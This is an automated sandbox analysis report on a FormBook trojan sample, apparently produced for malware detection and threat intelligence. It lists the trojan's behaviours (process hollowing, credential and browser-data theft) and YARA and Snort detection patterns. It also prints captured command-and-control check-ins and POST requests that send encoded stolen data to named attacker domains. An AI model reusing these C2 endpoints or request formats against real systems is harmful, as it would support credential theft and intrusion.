Windows Analysis Report
Lc8xQv8iZY.exe

Overview

General Information

Sample Name: Lc8xQv8iZY.exe
Analysis ID: 756323
MD5: 30571d64c9a9ed267159fa941a20840c
SHA1: bfb81d8a7c94781b3bd939bd17d500ae61b2ff70
SHA256: 85d6c9eac93fb8818d37dc15110ebd060b3e9df48043ee6bcf349df6aed047c5
Tags: 32, exe, Formbook, trojan
Infos:

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Snort IDS alert for network traffic
Sample uses process hollowing technique
Tries to steal Mail credentials (via file / registry access)
Maps a DLL or memory area into another process
Machine Learning detection for sample
Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
Queues an APC in another process (thread injection)
Machine Learning detection for dropped file
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Tries to harvest and steal browser information (history, passwords, etc)
Uses 32bit PE files
Yara signature match
Contains functionality to check if a debugger is running (IsDebuggerPresent)
May sleep (evasive loops) to hinder dynamic analysis
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
Contains functionality to read the clipboard data
HTTP GET or POST without a user agent
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Contains functionality to retrieve information about pressed keystrokes
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality for read data from the clipboard

Classification

  • System is w10x64
  • Lc8xQv8iZY.exe (PID: 3376 cmdline: C:\Users\user\Desktop\Lc8xQv8iZY.exe MD5: 30571D64C9A9ED267159FA941A20840C)
    • hvbvmxm.exe (PID: 3052 cmdline: "C:\Users\user\AppData\Local\Temp\hvbvmxm.exe" C:\Users\user\AppData\Local\Temp\ijamguwvje.h MD5: 1EEBBBD92B2C0C60F896FF8DCBCEDCAA)
      • conhost.exe (PID: 3748 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • hvbvmxm.exe (PID: 5420 cmdline: "C:\Users\user\AppData\Local\Temp\hvbvmxm.exe" C:\Users\user\AppData\Local\Temp\ijamguwvje.h MD5: 1EEBBBD92B2C0C60F896FF8DCBCEDCAA)
        • explorer.exe (PID: 3528 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
          • help.exe (PID: 1900 cmdline: C:\Windows\SysWOW64\help.exe MD5: 09A715036F14D3632AD03B52D1DA6BFF)
  • cleanup
{"C2 list": ["www.brennancorps.info/henz/"]}
Source | Rule | Description | Author | Strings
00000003.00000002.385960005.00000000005A0000.00000040.10000000.00040000.00000000.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
    00000003.00000002.385960005.00000000005A0000.00000040.10000000.00040000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown
    • 0x6611:$a1: 3C 30 50 4F 53 54 74 09 40
    • 0x1f070:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0xa8bf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
    • 0x17df7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
    00000003.00000002.385960005.00000000005A0000.00000040.10000000.00040000.00000000.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
    • 0x17bf5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x176a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x17cf7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x17e6f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0xa48a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x168ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0x1dde7:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1edda:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000003.00000002.385960005.00000000005A0000.00000040.10000000.00040000.00000000.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
    • 0x1a0e9:$sqlite3step: 68 34 1C 7B E1
    • 0x1ac61:$sqlite3step: 68 34 1C 7B E1
    • 0x1a12b:$sqlite3text: 68 38 2A 90 C5
    • 0x1aca6:$sqlite3text: 68 38 2A 90 C5
    • 0x1a142:$sqlite3blob: 68 53 D8 7F 8C
    • 0x1acbc:$sqlite3blob: 68 53 D8 7F 8C
    00000004.00000000.353715977.000000000D6C1000.00000040.00000001.00040000.00000000.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
      Source | Rule | Description | Author | Strings
      3.2.hvbvmxm.exe.400000.0.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
        3.2.hvbvmxm.exe.400000.0.unpack | Windows_Trojan_Formbook_1112e116 | unknown | unknown
        • 0x6f48:$a1: 3C 30 50 4F 53 54 74 09 40
        • 0x1f9a7:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
        • 0xb1f6:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
        • 0x1872e:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
        3.2.hvbvmxm.exe.400000.0.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
        • 0x1852c:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x17fd8:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x1862e:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x187a6:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0xadc1:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x17223:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0x1e71e:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1f711:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        3.2.hvbvmxm.exe.400000.0.unpack | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
        • 0x1aa20:$sqlite3step: 68 34 1C 7B E1
        • 0x1b598:$sqlite3step: 68 34 1C 7B E1
        • 0x1aa62:$sqlite3text: 68 38 2A 90 C5
        • 0x1b5dd:$sqlite3text: 68 38 2A 90 C5
        • 0x1aa79:$sqlite3blob: 68 53 D8 7F 8C
        • 0x1b5f3:$sqlite3blob: 68 53 D8 7F 8C
        3.2.hvbvmxm.exe.400000.0.raw.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
          No Sigma rule has matched
          Timestamp: 11/30/22-01:25:33.429382
          Source IP: 192.168.2.4
          Destination IP: 162.214.129.149
          SID: 2031453
          Source Port: 49699
          Destination Port: 80
          Protocol: TCP
          Classtype: A Network Trojan was detected
          Timestamp: 11/30/22-01:25:33.429382
          Source IP: 192.168.2.4
          Destination IP: 162.214.129.149
          SID: 2031412
          Source Port: 49699
          Destination Port: 80
          Protocol: TCP
          Classtype: A Network Trojan was detected
          Timestamp: 11/30/22-01:25:25.388400
          Source IP: 192.168.2.4
          Destination IP: 206.233.197.135
          SID: 2031453
          Source Port: 49697
          Destination Port: 80
          Protocol: TCP
          Classtype: A Network Trojan was detected
          Timestamp: 11/30/22-01:25:25.388400
          Source IP: 192.168.2.4
          Destination IP: 206.233.197.135
          SID: 2031412
          Source Port: 49697
          Destination Port: 80
          Protocol: TCP
          Classtype: A Network Trojan was detected
          Timestamp: 11/30/22-01:25:33.429382
          Source IP: 192.168.2.4
          Destination IP: 162.214.129.149
          SID: 2031449
          Source Port: 49699
          Destination Port: 80
          Protocol: TCP
          Classtype: A Network Trojan was detected
          Timestamp: 11/30/22-01:25:25.388400
          Source IP: 192.168.2.4
          Destination IP: 206.233.197.135
          SID: 2031449
          Source Port: 49697
          Destination Port: 80
          Protocol: TCP
          Classtype: A Network Trojan was detected

          AV Detection

          Source: Lc8xQv8iZY.exe, ReversingLabs: Detection: 48%
          Source: Lc8xQv8iZY.exe, Virustotal: Detection: 47%
          Source: Yara match, File source: 3.2.hvbvmxm.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 3.2.hvbvmxm.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 00000003.00000002.385960005.00000000005A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000004.00000000.353715977.000000000D6C1000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000005.00000002.568390844.0000000003040000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000005.00000002.568316286.0000000002D40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000004.00000000.376694506.000000000D6C1000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000003.00000002.386021250.00000000005D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000005.00000002.567455523.0000000000270000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000003.00000002.385717427.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: http://www.lopezmodeling.com/henz/?4hq=dpH6BKfQQ0cm5Imeo72RAP4DEbjLNfLp0vSyI4bn1RZjePkdeS9augOMgWVykt+ztx1R3MJW/gsn5nuFARzMtUktTfqb4tJ3+A==&o8=wR-h28GxgAvira URL Cloud: Label: malware
          Source: http://www.eufidelizo.com/henz/?4hq=wcp3urA+/rGtUuNVdXHur6CaD7Rg4XGXlvUWG7FdGjeYGPzd5j/g1Govvww0i9Uvwfj8E4D4P4OVv2O692M0flOUm4qON1Jqzg==&o8=wR-h28GxgAvira URL Cloud: Label: malware
          Source: http://www.brennancorps.info/henz/?4hq=P4ST2IJPckjMYpRf2FLdq0axEROKy7OOggEf6mHPhnME1yGBMW0egmkxYDI06dmXm7z7OVgXWzJ+YqSrULYkiycbwQA+qKMVmQ==&o8=wR-h28GxgAvira URL Cloud: Label: malware
          Source: http://www.lopezmodeling.com/henz/, Avira URL Cloud: Label: malware
          Source: http://www.brennancorps.info/henz/, Avira URL Cloud: Label: malware
          Source: www.brennancorps.info/henz/, Avira URL Cloud: Label: malware
          Source: http://www.lyonfinancialusa.com/henz/, Avira URL Cloud: Label: malware
          Source: http://www.afterdarksocial.club/henz/, Avira URL Cloud: Label: malware
          Source: http://www.foxwhistle.com/henz/, Avira URL Cloud: Label: malware
          Source: http://www.patrickguarte.com/henz/, Avira URL Cloud: Label: malware
          Source: http://www.patrickguarte.com/henz/?4hq=5p9Ov6C7qce51hIp6D8A72je8vUJddN77lLEFw6Ufibk2yN56suG3zROnD+rS7baXFO6PfoGYvZY6sqA3kYcUTUl/8YIp7EDwQ==&o8=wR-h28GxgAvira URL Cloud: Label: malware
          Source: eufidelizo.com, Virustotal: Detection: 8%
          Source: www.eufidelizo.com, Virustotal: Detection: 6%
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe, ReversingLabs: Detection: 53%
          Source: Lc8xQv8iZY.exe, Joe Sandbox ML: detected
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe, Joe Sandbox ML: detected
          Source: 00000003.00000002.385960005.00000000005A0000.00000040.10000000.00040000.00000000.sdmp, Malware Configuration Extractor: FormBook {"C2 list": ["www.brennancorps.info/henz/"]}
          Source: Lc8xQv8iZY.exe, Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
          Source: Binary string: wntdll.pdbUGP source: hvbvmxm.exe, 00000001.00000003.304073189.0000000002740000.00000004.00001000.00020000.00000000.sdmp, hvbvmxm.exe, 00000001.00000003.303031511.00000000028D0000.00000004.00001000.00020000.00000000.sdmp, hvbvmxm.exe, 00000003.00000003.310467881.00000000008FC000.00000004.00000800.00020000.00000000.sdmp, hvbvmxm.exe, 00000003.00000002.387087600.0000000000BAF000.00000040.00000800.00020000.00000000.sdmp, hvbvmxm.exe, 00000003.00000002.386259883.0000000000A90000.00000040.00000800.00020000.00000000.sdmp, hvbvmxm.exe, 00000003.00000003.308974263.0000000000757000.00000004.00000800.00020000.00000000.sdmp, help.exe, 00000005.00000003.385661856.0000000000563000.00000004.00000800.00020000.00000000.sdmp, help.exe, 00000005.00000002.569002403.000000000320F000.00000040.00000800.00020000.00000000.sdmp, help.exe, 00000005.00000003.387371533.0000000000700000.00000004.00000800.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: hvbvmxm.exe, hvbvmxm.exe, 00000003.00000003.310467881.00000000008FC000.00000004.00000800.00020000.00000000.sdmp, hvbvmxm.exe, 00000003.00000002.387087600.0000000000BAF000.00000040.00000800.00020000.00000000.sdmp, hvbvmxm.exe, 00000003.00000002.386259883.0000000000A90000.00000040.00000800.00020000.00000000.sdmp, hvbvmxm.exe, 00000003.00000003.308974263.0000000000757000.00000004.00000800.00020000.00000000.sdmp, help.exe, 00000005.00000003.385661856.0000000000563000.00000004.00000800.00020000.00000000.sdmp, help.exe, 00000005.00000002.569002403.000000000320F000.00000040.00000800.00020000.00000000.sdmp, help.exe, 00000005.00000003.387371533.0000000000700000.00000004.00000800.00020000.00000000.sdmp
          Source: C:\Users\user\Desktop\Lc8xQv8iZY.exe, Code function: 0_2_00405620 CloseHandle,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,0_2_00405620
          Source: C:\Users\user\Desktop\Lc8xQv8iZY.exe, Code function: 0_2_00405FF6 FindFirstFileA,FindClose,0_2_00405FF6
          Source: C:\Users\user\Desktop\Lc8xQv8iZY.exe, Code function: 0_2_00402654 FindFirstFileA,0_2_00402654
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe, Code function: 1_2_00410370 FindFirstFileExW,1_2_00410370

          Networking

          Source: C:\Windows\explorer.exe, Domain query: www.patrickguarte.com
          Source: C:\Windows\explorer.exe, Network Connect: 155.159.61.221 80
          Source: C:\Windows\explorer.exe, Domain query: www.eufidelizo.com
          Source: C:\Windows\explorer.exe, Network Connect: 192.185.35.86 80
          Source: C:\Windows\explorer.exe, Domain query: www.lyonfinancialusa.com
          Source: C:\Windows\explorer.exe, Domain query: www.afterdarksocial.club
          Source: C:\Windows\explorer.exe, Domain query: www.lopezmodeling.com
          Source: C:\Windows\explorer.exe, Network Connect: 192.185.217.47 80
          Source: C:\Windows\explorer.exe, Network Connect: 206.233.197.135 80
          Source: C:\Windows\explorer.exe, Network Connect: 154.22.100.62 80
          Source: C:\Windows\explorer.exe, Network Connect: 162.214.129.149 80
          Source: C:\Windows\explorer.exe, Domain query: www.foxwhistle.com
          Source: C:\Windows\explorer.exe, Network Connect: 2.57.90.16 80
          Source: C:\Windows\explorer.exe, Domain query: www.brennancorps.info
          Source: C:\Windows\explorer.exe, Domain query: www.19t221013d.tokyo
          Source: Traffic, Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49697 -> 206.233.197.135:80
          Source: Traffic, Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49697 -> 206.233.197.135:80
          Source: Traffic, Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49697 -> 206.233.197.135:80
          Source: Traffic, Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49699 -> 162.214.129.149:80
          Source: Traffic, Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49699 -> 162.214.129.149:80
          Source: Traffic, Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49699 -> 162.214.129.149:80
          Source: Malware configuration extractor, URLs: www.brennancorps.info/henz/
          Source: Joe Sandbox View, ASN Name: UNIFIEDLAYER-AS-1US UNIFIEDLAYER-AS-1US
          Source: Joe Sandbox View, ASN Name: COGENT-174US COGENT-174US
          Source: global trafficHTTP traffic detected: GET /henz/?4hq=wcp3urA+/rGtUuNVdXHur6CaD7Rg4XGXlvUWG7FdGjeYGPzd5j/g1Govvww0i9Uvwfj8E4D4P4OVv2O692M0flOUm4qON1Jqzg==&o8=wR-h28Gxg HTTP/1.1Host: www.eufidelizo.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /henz/?4hq=I97X75yj3reE70KD0jnZLHprtk7Ny9G/KKFZ2xPoakAfOE75REIszhxIs75pfZv/CVEdhBuwKxvuqF4TRlzEsULWUGP1g0EPzg==&o8=wR-h28Gxg HTTP/1.1Host: www.lyonfinancialusa.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /henz/?4hq=8TptbrIX6F4NxrWdTDNRTBReo0fMEuELv5cUeaX5N5UPFd9Hxy/eTVHt8QapNK2qZdoBzpjQ3MhBnX7XpU/EbwlnLs/kdjkkcQ==&o8=wR-h28Gxg HTTP/1.1Host: www.afterdarksocial.clubConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /henz/?4hq=5p9Ov6C7qce51hIp6D8A72je8vUJddN77lLEFw6Ufibk2yN56suG3zROnD+rS7baXFO6PfoGYvZY6sqA3kYcUTUl/8YIp7EDwQ==&o8=wR-h28Gxg HTTP/1.1Host: www.patrickguarte.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /henz/?4hq=P4ST2IJPckjMYpRf2FLdq0axEROKy7OOggEf6mHPhnME1yGBMW0egmkxYDI06dmXm7z7OVgXWzJ+YqSrULYkiycbwQA+qKMVmQ==&o8=wR-h28Gxg HTTP/1.1Host: www.brennancorps.infoConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /henz/?4hq=dpH6BKfQQ0cm5Imeo72RAP4DEbjLNfLp0vSyI4bn1RZjePkdeS9augOMgWVykt+ztx1R3MJW/gsn5nuFARzMtUktTfqb4tJ3+A==&o8=wR-h28Gxg HTTP/1.1Host: www.lopezmodeling.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /henz/?4hq=jIhXpQA4pSG2yYWBb37zpp/PG+nmQ9F5uiLrR0YNz1ez7r/FQUV2GqKIrgsyQUbvld7C5UuQUlYsY6nmozac85OtAKDr0AUC2A==&o8=wR-h28Gxg HTTP/1.1Host: www.foxwhistle.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox View, IP Address: 192.185.217.47 192.185.217.47
          Source: global trafficHTTP traffic detected: POST /henz/ HTTP/1.1Host: www.lyonfinancialusa.comConnection: closeContent-Length: 185Cache-Control: no-cacheOrigin: http://www.lyonfinancialusa.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.lyonfinancialusa.com/henz/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 34 68 71 3d 46 5f 54 33 34 4d 43 59 37 4c 4c 6c 35 30 36 46 70 55 6d 45 4c 6d 56 30 6d 31 6d 41 7e 59 47 31 45 72 5a 72 7a 51 72 43 4f 57 4d 4c 57 30 50 39 66 6d 38 71 30 51 56 44 6d 5a 39 4b 58 4c 58 59 43 47 67 65 67 44 28 54 4b 77 71 30 79 6a 6f 58 48 68 65 62 75 32 37 65 5a 42 62 45 69 45 6b 62 33 42 53 6a 35 64 4f 6e 57 42 38 78 4b 44 71 48 63 52 32 4b 48 38 32 37 68 43 41 6c 51 79 65 4e 57 59 50 55 32 4c 59 59 6e 75 74 6f 58 35 49 43 7a 65 73 58 73 41 4b 7a 4d 4c 79 53 41 5f 6b 2d 4b 4d 30 4f 32 5f 38 30 57 4c 61 6b 52 4f 65 51 4c 77 29 2e 00 00 00 00 00 00 00 00 Data Ascii: 4hq=F_T34MCY7LLl506FpUmELmV0m1mA~YG1ErZrzQrCOWMLW0P9fm8q0QVDmZ9KXLXYCGgegD(TKwq0yjoXHhebu27eZBbEiEkb3BSj5dOnWB8xKDqHcR2KH827hCAlQyeNWYPU2LYYnutoX5ICzesXsAKzMLySA_k-KM0O2_80WLakROeQLw).
          Source: global trafficHTTP traffic detected: POST /henz/ HTTP/1.1Host: www.afterdarksocial.clubConnection: closeContent-Length: 185Cache-Control: no-cacheOrigin: http://www.afterdarksocial.clubUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.afterdarksocial.club/henz/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 34 68 71 3d 78 52 42 4e 59 66 6f 55 79 47 73 48 35 70 57 58 50 6b 34 67 55 52 30 62 31 78 47 6c 43 71 63 4a 6e 59 6f 75 65 4c 76 44 52 72 55 33 4c 74 52 78 78 42 4f 4b 54 58 37 56 68 44 53 6c 43 70 65 6a 56 38 35 48 73 5a 4b 50 31 65 30 39 69 47 6e 2d 6f 31 4c 7a 5a 54 4e 45 43 76 72 32 5a 51 63 57 66 59 35 34 36 45 77 73 4f 4d 41 54 43 73 4d 74 53 42 49 37 47 4f 4a 51 66 32 30 47 45 70 37 30 66 39 31 5f 75 6d 4e 79 4e 75 31 32 74 77 56 64 37 5a 42 4f 4f 71 62 36 35 79 43 5f 53 4c 32 6a 4d 79 37 32 35 65 52 55 37 4f 77 73 68 47 53 56 63 41 29 2e 00 00 00 00 00 00 00 00 Data Ascii: 4hq=xRBNYfoUyGsH5pWXPk4gUR0b1xGlCqcJnYoueLvDRrU3LtRxxBOKTX7VhDSlCpejV85HsZKP1e09iGn-o1LzZTNECvr2ZQcWfY546EwsOMATCsMtSBI7GOJQf20GEp70f91_umNyNu12twVd7ZBOOqb65yC_SL2jMy725eRU7OwshGSVcA).
          Source: global trafficHTTP traffic detected: POST /henz/ HTTP/1.1Host: www.patrickguarte.comConnection: closeContent-Length: 185Cache-Control: no-cacheOrigin: http://www.patrickguarte.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.patrickguarte.com/henz/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 34 68 71 3d 30 72 56 75 73 4f 28 4a 6e 64 6d 42 33 79 67 33 33 31 6c 64 33 47 58 57 33 64 4a 4e 62 61 42 51 37 6e 44 43 46 6b 6d 33 43 67 48 48 37 53 4d 36 72 76 75 47 67 41 5a 47 68 32 57 50 62 49 58 34 56 56 72 4b 4f 62 34 41 51 6f 41 65 31 38 75 43 6e 67 55 4a 57 52 4a 34 28 75 4d 75 76 4c 64 48 79 56 4a 38 50 6c 4b 54 30 4b 6c 59 70 47 46 38 6c 5f 30 42 45 76 4e 37 78 77 7a 4c 6c 5f 4f 6b 72 45 32 69 66 6e 64 45 6b 6c 55 52 5a 57 34 74 65 6b 4e 33 67 53 6d 47 61 63 31 43 47 36 33 69 6e 33 53 33 41 36 71 70 49 52 49 44 4e 46 7e 47 49 41 29 2e 00 00 00 00 00 00 00 00 Data Ascii: 4hq=0rVusO(JndmB3yg331ld3GXW3dJNbaBQ7nDCFkm3CgHH7SM6rvuGgAZGh2WPbIX4VVrKOb4AQoAe18uCngUJWRJ4(uMuvLdHyVJ8PlKT0KlYpGF8l_0BEvN7xwzLl_OkrE2ifndEklURZW4tekN3gSmGac1CG63in3S3A6qpIRIDNF~GIA).
          Source: global trafficHTTP traffic detected: POST /henz/ HTTP/1.1Host: www.brennancorps.infoConnection: closeContent-Length: 185Cache-Control: no-cacheOrigin: http://www.brennancorps.infoUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.brennancorps.info/henz/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 34 68 71 3d 43 36 36 7a 31 2d 46 33 50 30 6d 6f 65 62 4e 7a 7e 51 71 50 73 58 72 32 61 6b 65 42 31 62 43 41 6e 53 55 34 33 45 57 56 36 47 38 51 75 69 53 77 4b 78 55 5a 6d 32 77 6a 55 6a 77 6b 7a 66 75 54 6e 37 57 47 44 32 64 6d 59 52 64 38 52 4a 6a 62 62 50 55 4e 6b 69 49 58 75 42 41 6c 68 39 74 51 6c 72 42 51 56 52 4c 62 6e 50 6f 79 46 49 65 43 56 69 73 32 79 4d 59 73 55 32 49 66 73 4b 69 4b 66 63 31 64 35 65 4e 5f 61 39 53 2d 44 4c 72 4a 54 30 77 6f 41 6a 42 53 51 4a 37 68 6c 41 56 34 61 4f 37 69 65 4e 44 32 59 71 6a 41 33 6d 47 31 67 77 29 2e 00 00 00 00 00 00 00 00 Data Ascii: 4hq=C66z1-F3P0moebNz~QqPsXr2akeB1bCAnSU43EWV6G8QuiSwKxUZm2wjUjwkzfuTn7WGD2dmYRd8RJjbbPUNkiIXuBAlh9tQlrBQVRLbnPoyFIeCVis2yMYsU2IfsKiKfc1d5eN_a9S-DLrJT0woAjBSQJ7hlAV4aO7ieND2YqjA3mG1gw).
          Source: global trafficHTTP traffic detected: POST /henz/ HTTP/1.1Host: www.lopezmodeling.comConnection: closeContent-Length: 185Cache-Control: no-cacheOrigin: http://www.lopezmodeling.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.lopezmodeling.com/henz/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 34 68 71 3d 51 72 76 61 43 39 61 69 56 32 4d 36 28 65 75 56 73 50 58 43 4c 75 38 51 48 75 32 52 48 34 28 72 32 39 32 74 4c 61 4b 33 32 77 6c 51 64 76 38 44 4f 6c 41 63 6c 6a 36 4d 38 45 6c 32 6a 75 71 59 6d 43 45 51 35 74 45 6a 39 53 49 6a 68 57 4f 46 43 30 54 36 70 68 55 78 63 59 75 64 78 2d 39 56 7e 4f 44 72 35 53 4e 52 6c 67 65 7a 51 66 28 65 6e 68 7a 75 54 34 42 5a 73 30 49 31 37 7a 73 43 70 68 6b 45 74 7a 70 4b 31 36 71 54 41 37 61 6e 31 6e 74 55 54 6d 6b 34 54 37 72 41 41 35 35 4b 6b 45 78 45 73 59 4d 6e 64 7a 51 78 7a 44 7e 4f 52 77 29 2e 00 00 00 00 00 00 00 00 Data Ascii: 4hq=QrvaC9aiV2M6(euVsPXCLu8QHu2RH4(r292tLaK32wlQdv8DOlAclj6M8El2juqYmCEQ5tEj9SIjhWOFC0T6phUxcYudx-9V~ODr5SNRlgezQf(enhzuT4BZs0I17zsCphkEtzpK16qTA7an1ntUTmk4T7rAA55KkExEsYMndzQxzD~ORw).
          Source: global trafficHTTP traffic detected: POST /henz/ HTTP/1.1Host: www.foxwhistle.comConnection: closeContent-Length: 185Cache-Control: no-cacheOrigin: http://www.foxwhistle.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.foxwhistle.com/henz/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 34 68 71 3d 75 4b 4a 33 71 67 6f 51 6a 53 53 49 6c 37 32 53 57 52 62 78 6d 4a 66 79 62 2d 43 48 5a 61 64 44 71 46 6a 78 48 58 77 39 33 69 43 66 6a 62 65 45 52 54 39 32 4c 59 53 45 33 41 4d 38 63 33 61 5a 67 38 43 4b 6d 47 6a 6a 44 46 31 39 43 71 33 69 35 31 36 62 34 4c 61 63 41 5a 4c 31 77 7a 45 78 77 70 79 56 48 52 6b 62 4f 53 7e 71 41 33 58 61 4a 37 6b 37 62 74 6d 45 4b 38 6e 45 35 33 74 6f 56 37 6c 56 72 36 50 49 42 54 57 77 58 39 76 46 62 47 67 4c 7e 48 70 47 45 74 4f 2d 73 72 33 35 7e 37 51 67 4b 64 72 48 41 74 48 34 6c 47 7e 42 57 67 29 2e 00 00 00 00 00 00 00 00 Data Ascii: 